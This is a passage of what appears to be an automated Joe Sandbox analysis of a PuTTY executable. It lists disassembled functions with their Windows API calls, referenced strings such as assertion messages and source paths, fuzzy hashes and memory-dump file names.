Associated: 00000007.00000002.2984764814.0000000000CA4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984876233.0000000000CAA000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ba0000_putty.jbxd

Similarity

API ID: _strlen
String ID: %s%s$/home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/settings.c$Cipher$p - buf == maxlen
API String ID: 4218353326-3676115531
Opcode ID: 8678d8d4d2d8a9ee519903b066d21380744cc441d1d5a4e8f8874469d7f0f978
Instruction ID: bbb71f302514d8b65c46bebc7e42d9294e218cdeb4f6d69d5ec58e81b49d57e2
Opcode Fuzzy Hash: 8678d8d4d2d8a9ee519903b066d21380744cc441d1d5a4e8f8874469d7f0f978
Instruction Fuzzy Hash: 3C412975A18304ABDB107E24DC8572EFAE9DBD0B54F1804BEF44597382F6B2EC108796

Function 00C5A9E5 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002,00000000,?,?,?,00C5A3C4,?,00000000), ref: 00C5AA7E
GetLocaleInfoW.KERNEL32(?,20001004,?,00000002,00000000,?,?,?,00C5A3C4,?,00000000), ref: 00C5AAA7
GetACP.KERNEL32(?,?,00C5A3C4,?,00000000), ref: 00C5AABC

Strings

OCP, xrefs: 00C5AA39
ACP, xrefs: 00C5AA03

Memory Dump Source

Source File: 00000007.00000002.2984563110.0000000000BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000007.00000002.2984524294.0000000000BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984701874.0000000000C69000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984876233.0000000000CAA000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ba0000_putty.jbxd

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: 9c7286d9b72105ccf6e007f80dd10bcb37c93f221f8b23289d13823a88df590f
Instruction ID: e7d4927f02e5d5529f6ce44c97669f3eb32a337ce5d8984ffc892976de75df45
Opcode Fuzzy Hash: 9c7286d9b72105ccf6e007f80dd10bcb37c93f221f8b23289d13823a88df590f
Instruction Fuzzy Hash: DD21E53A600101AADB208F57CB04B9773A6AF50F12B568664ED16C7100F732DF89EB5A

Function 00BDD3E0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 76windowCOMMON

Download Yara Rule

APIs

FormatMessageA.KERNEL32(00001200,00000000,?,00000400,?,0000FFFF,00000000,?,?,?,?,00BD711E,?), ref: 00BDD46B
_strlen.LIBCMT ref: 00BDD476
GetLastError.KERNEL32(?,0000FFFF,00000000,?,?,?,?,00BD711E,?), ref: 00BDD490

Strings

Error %d: %s, xrefs: 00BDD4AD
(unable to format: FormatMessage returned %u), xrefs: 00BDD497

Memory Dump Source

Source File: 00000007.00000002.2984563110.0000000000BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000007.00000002.2984524294.0000000000BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984701874.0000000000C69000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984876233.0000000000CAA000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ba0000_putty.jbxd

Similarity

API ID: ErrorFormatLastMessage_strlen
String ID: (unable to format: FormatMessage returned %u)$Error %d: %s
API String ID: 2706427827-1777221902
Opcode ID: ffcb04be1a0723281790ac42db5a134239987561f3f2ab751528de2263f518c7
Instruction ID: c51803e27c70ac42ad28cea9c2514947b593d343c435ba6f2c845634f755a053
Opcode Fuzzy Hash: ffcb04be1a0723281790ac42db5a134239987561f3f2ab751528de2263f518c7
Instruction Fuzzy Hash: 4D21FCB1A843416BD731AB24AC07F6B76D4AF99748F04447DF5C8D7392FAB0A4408797

Function 00BEA160 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 57libraryfileloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(00000000,GetFileAttributesExA), ref: 00BEA1A2
FindFirstFileA.KERNEL32(?), ref: 00BEA1D8
CloseHandle.KERNEL32(00000000), ref: 00BEA1E4

Strings

kernel32.dll, xrefs: 00BEA186
GetFileAttributesExA, xrefs: 00BEA19C

Memory Dump Source

Source File: 00000007.00000002.2984563110.0000000000BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000007.00000002.2984524294.0000000000BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984701874.0000000000C69000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984876233.0000000000CAA000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ba0000_putty.jbxd

Similarity

API ID: AddressCloseFileFindFirstHandleProc
String ID: GetFileAttributesExA$kernel32.dll
API String ID: 3854970465-595542130
Opcode ID: 67a70ae791bab789b8f6a88dd07b72cb89439d0c750c69ed1e1a27a95b5cbca3
Instruction ID: e7a197eeea7a8983b31fc87b75d560491d23ef4cf0a2d9825e9fed89c9ee0e97
Opcode Fuzzy Hash: 67a70ae791bab789b8f6a88dd07b72cb89439d0c750c69ed1e1a27a95b5cbca3
Instruction Fuzzy Hash: E811A3707052409FDB189F39EC9972E37E8AB86354F00446DE446E72F0D770A8049747

Function 00C5A27B Relevance: 7.7, APIs: 5, Instructions: 183COMMON

Download Yara Rule

APIs

Part of subcall function 00C55042: GetLastError.KERNEL32(?,?,00C479D8,?,?,?,?,00C4FBB7,00C4FB84,?,?,?,?,?,00C4FB84,?), ref: 00C55046
Part of subcall function 00C55042: SetLastError.KERNEL32(00000000,00C4FB84,?,?,?,?,?,00C4FB84,?,00000000,?,00000003,00C4348B), ref: 00C550E8

GetUserDefaultLCID.KERNEL32 ref: 00C5A387
IsValidCodePage.KERNEL32(00000000), ref: 00C5A3D0
IsValidLocale.KERNEL32(?,00000001), ref: 00C5A3DF
GetLocaleInfoW.KERNEL32(?,00001001,?,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 00C5A427
GetLocaleInfoW.KERNEL32(?,00001002,?,00000040), ref: 00C5A446

Memory Dump Source

Source File: 00000007.00000002.2984563110.0000000000BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000007.00000002.2984524294.0000000000BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984701874.0000000000C69000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984876233.0000000000CAA000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ba0000_putty.jbxd

Similarity

API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
String ID:
API String ID: 415426439-0
Opcode ID: d4842c7d3bc4ec58809f935d9e8c14c0bd954216270ae7afa4b6daa039196670
Instruction ID: af0da9ec097b35542889716c10655f2b3fcf6c3a58a710931c91d4c7b776a723
Opcode Fuzzy Hash: d4842c7d3bc4ec58809f935d9e8c14c0bd954216270ae7afa4b6daa039196670
Instruction Fuzzy Hash: 8E51B375A00205AFDB10DFA6CC45BBE73B8BF08706F044629ED11E7160E770DA88CB6A

Function 00BA9D30 Relevance: 7.5, APIs: 5, Instructions: 23clipboardwindowCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32(00000000), ref: 00BA9D32
GetClipboardData.USER32(0000000D), ref: 00BA9D3E
GetClipboardData.USER32(00000001), ref: 00BA9D51
SendMessageA.USER32(?,00008004,00000000,00000000), ref: 00BA9D68
CloseClipboard.USER32 ref: 00BA9D6E

Memory Dump Source

Source File: 00000007.00000002.2984563110.0000000000BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000007.00000002.2984524294.0000000000BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984701874.0000000000C69000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984876233.0000000000CAA000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ba0000_putty.jbxd

Similarity

API ID: Clipboard$Data$CloseMessageOpenSend
String ID:
API String ID: 2111581930-0
Opcode ID: 6f5a01b5c513b7094af4db40642e6197ab6ff363ba2ae5a5433f59add70eaa08
Instruction ID: 8b6ac8d5772fb1ba0c5dc03a0233546b6d36fbaf1c86758f018a5080b8859d13
Opcode Fuzzy Hash: 6f5a01b5c513b7094af4db40642e6197ab6ff363ba2ae5a5433f59add70eaa08
Instruction Fuzzy Hash: 8EE0BF303582015BF7551F71DC1EB2E3A99FB41B45F10847F7646C94E0DFA0C855A635

Function 00BA5B50 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 51windowCOMMON

Download Yara Rule

APIs

DeleteMenu.USER32(00000000,00000400,?,?,?,00BA1760), ref: 00BA5B6D
AppendMenuA.USER32(00000000,00001000,?), ref: 00BA5BA1
AppendMenuA.USER32(00000001,00001000,(No sessions)), ref: 00BA5BD6

Strings

(No sessions), xrefs: 00BA5BC4

Memory Dump Source

Source File: 00000007.00000002.2984563110.0000000000BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000007.00000002.2984524294.0000000000BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984701874.0000000000C69000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984876233.0000000000CAA000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ba0000_putty.jbxd

Similarity

API ID: Menu$Append$Delete
String ID: (No sessions)
API String ID: 2878686843-1102551510
Opcode ID: 1543dba3dcab37519049e467daacfcb7f8f4d11577598150689ff3e44a51c476
Instruction ID: 9b684c8780b2f950d1d600ac89f340327e80955cdd248d84b5d753a185be0c94
Opcode Fuzzy Hash: 1543dba3dcab37519049e467daacfcb7f8f4d11577598150689ff3e44a51c476
Instruction Fuzzy Hash: 45F0A4B1740294ABDA304F58EE65FDD7761E34771AF500075FA04E71B0C3A6A9419B68

Function 00BD8B80 Relevance: 6.1, APIs: 4, Instructions: 86COMMON

Download Yara Rule

APIs

_strlen.LIBCMT ref: 00BD8B97
_strlen.LIBCMT ref: 00BD8BC1
_strlen.LIBCMT ref: 00BD8BF5
_strlen.LIBCMT ref: 00BD8C1B

Memory Dump Source

Source File: 00000007.00000002.2984563110.0000000000BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000007.00000002.2984524294.0000000000BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984701874.0000000000C69000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984876233.0000000000CAA000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ba0000_putty.jbxd

Similarity

API ID: _strlen
String ID:
API String ID: 4218353326-0
Opcode ID: 3004f9d213f0a98447645bb89c6a335ec27682dca08725aaaba78919f1bea7fb
Instruction ID: 3d6f3a7a56884e0f8007a52b7112d04aa65e5ab5d799aa88ba7ebbf2df02035e
Opcode Fuzzy Hash: 3004f9d213f0a98447645bb89c6a335ec27682dca08725aaaba78919f1bea7fb
Instruction Fuzzy Hash: 6711B7B59052046BD714EB14AC81A6FB3E4EFA574AF09043DFC8997302F631EA0886A7

Function 00C4051A Relevance: 6.1, APIs: 4, Instructions: 73COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00C40526
IsDebuggerPresent.KERNEL32 ref: 00C405F2
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00C40612
UnhandledExceptionFilter.KERNEL32(?), ref: 00C4061C

Memory Dump Source

Source File: 00000007.00000002.2984563110.0000000000BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000007.00000002.2984524294.0000000000BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984701874.0000000000C69000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984876233.0000000000CAA000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ba0000_putty.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: a4837af1d583fab0aea0f6aff33a912aabbed33236497fc930f30443b1e5307b
Instruction ID: 02ead9041b14010e62798503e26b9b5ffe4a13f78e59d904a59404adb3bf3d46
Opcode Fuzzy Hash: a4837af1d583fab0aea0f6aff33a912aabbed33236497fc930f30443b1e5307b
Instruction Fuzzy Hash: 03311475D4121C9BDB20EFA5D989BCDBBB8BF08300F5041AAE509AB251EB709B85CF45

Function 00BC3620 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 57windowCOMMON

Download Yara Rule

APIs

SendDlgItemMessageA.USER32(?,?,000000B1,?,?), ref: 00BC36AA

Strings

/home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/controls.c, xrefs: 00BC3686
c && c->ctrl->type == CTRL_EDITBOX, xrefs: 00BC368B

Memory Dump Source

Source File: 00000007.00000002.2984563110.0000000000BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000007.00000002.2984524294.0000000000BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984701874.0000000000C69000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984876233.0000000000CAA000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ba0000_putty.jbxd

Similarity

API ID: ItemMessageSend
String ID: /home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/controls.c$c && c->ctrl->type == CTRL_EDITBOX
API String ID: 3015471070-587671386
Opcode ID: aae1ad83b9bbb7970cb924d9e02f9deb95dbdcdb877b857e0d3d005be300204d
Instruction ID: ba2878e83ae42401fe66c0bc2ee0b4345e23b88af640f9d3a97df322bf7b54bb
Opcode Fuzzy Hash: aae1ad83b9bbb7970cb924d9e02f9deb95dbdcdb877b857e0d3d005be300204d
Instruction Fuzzy Hash: CD118B75648309EFD610DE44D885E26F3E8FB5AB08F414179F944A3301E371AE248BA2

Function 00BDD2F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 56libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(00000000,GetVersionExA), ref: 00BDD346

Strings

kernel32.dll, xrefs: 00BDD32A
GetVersionExA, xrefs: 00BDD340

Memory Dump Source

Source File: 00000007.00000002.2984563110.0000000000BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000007.00000002.2984524294.0000000000BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984701874.0000000000C69000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984876233.0000000000CAA000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ba0000_putty.jbxd

Similarity

API ID: AddressProc
String ID: GetVersionExA$kernel32.dll
API String ID: 190572456-3521452493
Opcode ID: 43e0fd6bdeebc2afd70d50dffa04723e090d4da6f63adc8c9bc0e10452ef2b80
Instruction ID: 71c2ce1119277f8cfc192979508c71dcdd7110698623a0d5894be81e2eb8bdbd
Opcode Fuzzy Hash: 43e0fd6bdeebc2afd70d50dffa04723e090d4da6f63adc8c9bc0e10452ef2b80
Instruction Fuzzy Hash: 1C11D6B0905B40AFD7209F34FC45B0DBBE4E786764F40865EE495973E2E3709844CB46

Function 00BD3960 Relevance: 5.2, Strings: 4, Instructions: 230COMMON

Download Yara Rule

Strings

j < n, xrefs: 00BD3BA8
/home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/settings.c, xrefs: 00BD3AEC, 00BD3B65, 00BD3BA3
mapping[i].v < 32, xrefs: 00BD3AF1
mapping[i].v >= 0, xrefs: 00BD3B6A

Memory Dump Source

Source File: 00000007.00000002.2984563110.0000000000BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000007.00000002.2984524294.0000000000BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984701874.0000000000C69000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984876233.0000000000CAA000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ba0000_putty.jbxd

Similarity

API ID: _strlen
String ID: /home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/settings.c$j < n$mapping[i].v < 32$mapping[i].v >= 0
API String ID: 4218353326-1288357475
Opcode ID: dba6115abd3885c7bf1c8ba23900a42a7265c3f7c8ca93ecd6d38df36de3306c
Instruction ID: 77dc132b49baed691a5b4e1d1703a5bfc901fbcd836f2bb14e2fd4cc0f2b6ae6
Opcode Fuzzy Hash: dba6115abd3885c7bf1c8ba23900a42a7265c3f7c8ca93ecd6d38df36de3306c
Instruction Fuzzy Hash: 7671C075A08300AFC710AF14C89196EF7E1EB95B24F54896EF9D957342F371EA018B93

Function 00BDD000 Relevance: 4.8, APIs: 3, Instructions: 259COMMON

Download Yara Rule

APIs

_strlen.LIBCMT ref: 00BDD05B
_strlen.LIBCMT ref: 00BDD076
_strlen.LIBCMT ref: 00BDD090

Memory Dump Source

Source File: 00000007.00000002.2984563110.0000000000BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000007.00000002.2984524294.0000000000BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984701874.0000000000C69000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984876233.0000000000CAA000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ba0000_putty.jbxd

Similarity

API ID: _strlen
String ID:
API String ID: 4218353326-0
Opcode ID: e98c16062a08d61931784a9d5afa60b32aaa408e4bd18aeda663167cc244f94c
Instruction ID: bd8d39a0ed30ed40d22b7b6f497ed32d9a10763b453d75b39706b0d5b4e72cf4
Opcode Fuzzy Hash: e98c16062a08d61931784a9d5afa60b32aaa408e4bd18aeda663167cc244f94c
Instruction Fuzzy Hash: C3712672A043456BDB305E28CC41B6AF7D1EFD2314F4945AAFCD9A7382F232DD468686

Function 00C5A56C Relevance: 4.7, APIs: 3, Instructions: 205COMMON

Download Yara Rule

APIs

Part of subcall function 00C55042: GetLastError.KERNEL32(?,?,00C479D8,?,?,?,?,00C4FBB7,00C4FB84,?,?,?,?,?,00C4FB84,?), ref: 00C55046
Part of subcall function 00C55042: SetLastError.KERNEL32(00000000,00C4FB84,?,?,?,?,?,00C4FB84,?,00000000,?,00000003,00C4348B), ref: 00C550E8

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00C5A5C0
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00C5A60A
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00C5A6D0

Memory Dump Source

Source File: 00000007.00000002.2984563110.0000000000BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000007.00000002.2984524294.0000000000BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984701874.0000000000C69000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984876233.0000000000CAA000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ba0000_putty.jbxd

Similarity

API ID: InfoLocale$ErrorLast
String ID:
API String ID: 661929714-0
Opcode ID: aa1d304b9b6302f34063b6aa89fa669b1cfcc84e28c6813080aa0210e294fee7
Instruction ID: 0cb2c6febb2bb350b36ebec96d3debb349909d9bfd43cc88e769a867e20adc64
Opcode Fuzzy Hash: aa1d304b9b6302f34063b6aa89fa669b1cfcc84e28c6813080aa0210e294fee7
Instruction Fuzzy Hash: BD61B2795101079FDB289F26CC82BBA73B8EF08341F14427AED15C6281EB34DAC9DB59

Function 00C5612D Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 00C56225
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 00C5622F
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 00C5623C

Memory Dump Source

Source File: 00000007.00000002.2984563110.0000000000BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000007.00000002.2984524294.0000000000BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984701874.0000000000C69000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984876233.0000000000CAA000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ba0000_putty.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 9e9955af86869f13543f39af5e3c0d6cc028bbac5911b7633f2ee65c921efcf4
Instruction ID: 9a1c8626085b252a2fada6c263be22dce3cae1c26adc112449b0225b70fe965e
Opcode Fuzzy Hash: 9e9955af86869f13543f39af5e3c0d6cc028bbac5911b7633f2ee65c921efcf4
Instruction Fuzzy Hash: 8731C37594122CABCB21DF28DD8978DBBB8BF18310F5041EAE91CA7261E7709F858F45

Function 00BA8280 Relevance: 4.6, APIs: 3, Instructions: 52windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00BD8E70: _strlen.LIBCMT ref: 00BD8E80

IsIconic.USER32 ref: 00BA82D7
SetWindowTextW.USER32(00000000,?), ref: 00BA82F7
SetWindowTextA.USER32(00000000,00000000), ref: 00BA8315

Memory Dump Source

Source File: 00000007.00000002.2984563110.0000000000BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000007.00000002.2984524294.0000000000BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984701874.0000000000C69000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984876233.0000000000CAA000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ba0000_putty.jbxd

Similarity

API ID: TextWindow$Iconic_strlen
String ID:
API String ID: 1204891203-0
Opcode ID: a612a719d76eb0e835915e56babf4fcb3ff32ffe08573f34113611a45481ab66
Instruction ID: 66d7e98d68909a48648b174abfcab369f5be68bad09118b9958b40839129bbed
Opcode Fuzzy Hash: a612a719d76eb0e835915e56babf4fcb3ff32ffe08573f34113611a45481ab66
Instruction Fuzzy Hash: 1F01D2F2808240BBEA102B20BD56F3E7AA9EB13B09F0404A5F80596271FF214914D7A5

Function 00BA8330 Relevance: 4.6, APIs: 3, Instructions: 52windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00BD8E70: _strlen.LIBCMT ref: 00BD8E80

IsIconic.USER32 ref: 00BA8387
SetWindowTextW.USER32(00000000,?), ref: 00BA83A7
SetWindowTextA.USER32(00000000,00000000), ref: 00BA83C5

Memory Dump Source

Source File: 00000007.00000002.2984563110.0000000000BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000007.00000002.2984524294.0000000000BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984701874.0000000000C69000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984876233.0000000000CAA000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ba0000_putty.jbxd

Similarity

API ID: TextWindow$Iconic_strlen
String ID:
API String ID: 1204891203-0
Opcode ID: ec5572487ff3696962a532ece1dd93f9df56a48560e67173e9324dd28641a876
Instruction ID: 85619a72b24d2e862837a9e34f9f117541830921e0511b96e68b1a576863635b
Opcode Fuzzy Hash: ec5572487ff3696962a532ece1dd93f9df56a48560e67173e9324dd28641a876
Instruction Fuzzy Hash: F401F9F28081507BEA102B10BD57F2E77E9D703709F0400A5FC0592171EF214914D7A6

Function 00BB76B0 Relevance: 3.9, Strings: 3, Instructions: 173COMMON

Download Yara Rule

Strings

/home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/terminal/terminal.c, xrefs: 00BB76D4, 00BB7769, 00BB7812
col >= 0 && col < line->cols, xrefs: 00BB76D9, 00BB776E
tmpsize <= INT_MAX, xrefs: 00BB7817

Memory Dump Source

Source File: 00000007.00000002.2984563110.0000000000BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000007.00000002.2984524294.0000000000BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984701874.0000000000C69000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984876233.0000000000CAA000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ba0000_putty.jbxd

Similarity

API ID:
String ID: /home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/terminal/terminal.c$col >= 0 && col < line->cols$tmpsize <= INT_MAX
API String ID: 0-1128092879
